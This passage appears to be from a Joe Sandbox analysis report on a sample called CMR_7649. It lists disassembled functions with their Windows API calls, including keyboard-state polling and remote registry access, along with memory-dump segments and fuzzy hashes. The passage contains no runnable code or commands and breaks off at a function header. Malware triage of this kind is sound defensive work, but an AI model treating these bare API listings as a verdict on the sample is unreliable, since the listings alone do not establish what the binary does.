                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                • String ID:
                                                • API String ID: 2170234536-0
                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                • String ID:
                                                • API String ID: 3218148540-0
                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                • String ID:
                                                • API String ID: 136442275-0
                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 00467490
                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcstok.LIBCMT ref: 004674FF
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcstok.LIBCMT ref: 004675B2
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcscpy.LIBCMT ref: 00467641
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcslen.LIBCMT ref: 004677BD
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                • String ID: X
                                                • API String ID: 3104067586-3081909835
                                                • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                Strings
                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 440038798-2785691316
                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                • _wcslen.LIBCMT ref: 004610A3
                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                • String ID: ThumbnailClass
                                                • API String ID: 4136854206-1241985126
                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                • String ID: 2
                                                • API String ID: 1331449709-450215437
                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                • API String ID: 3054410614-2561132961
                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 600699880-22481851
                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: static
                                                • API String ID: 3375834691-2160076837
                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                • API String ID: 2907320926-3566645568
                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
